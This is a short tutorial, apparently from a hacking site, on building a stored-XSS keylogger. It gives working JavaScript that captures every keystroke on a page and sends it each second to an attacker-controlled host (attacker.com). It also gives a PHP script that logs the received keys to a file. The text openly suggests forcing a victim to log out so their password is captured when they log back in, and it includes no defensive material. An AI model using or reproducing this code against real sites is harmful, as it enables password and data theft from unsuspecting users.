::: How to make a XSS Keylogger :::

XSS Keylogger

If you have never heard about XSS Keyloggers, it’s a simple way to grab informations a user type on a web page.

Keylogging is the action of recording the keys struck on a keyboard.
A keylogger can be used to spy on someone, grab their passwords, read their conversations or steal their personal informations.

Cross-site scripting attacks are often overlooked by administrators and attackers but a stored XSS Keylogger can be critical.
In most case the attacker will just grab the user SESSION cookie to access a website as the victim. But in some situation it comes helpful to know the password of the target.

XSS Keyloggers is a great way to deal with such problem. By logging out the target and capturing its keystrokes on next logging in you will be able to know the password.


Javascript Keylogger

Code:

var keys = '';

document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

window.setInterval(function(){
    new Image().src = 'http://attacker.com/keylogger.php?c=' + keys;
    keys = '';
}, 1000);

This simple Javascript code will store all key strokes in the variable keys...
Every 1 seconds a request is made to the attacker server with the stored key strokes as parameter afterward keys is cleared !!!

PHP Grabber

Code:

<?php

// keylogger.php

if(!empty($_GET['c'])) {
    $logfile = fopen('data.txt', 'a+');
    fwrite($logfile, $_GET['c']);
    fclose($logfile);
}
?>

For each requests this PHP script will grab a string contained in $_GET['c'], this string contains all new key stokes.
Everything is concatenated and stored in a file data.txt.

The attacker will be able to read everything the target typed on the page !!!
It’s possible to enhance both scripts to obtain more informations...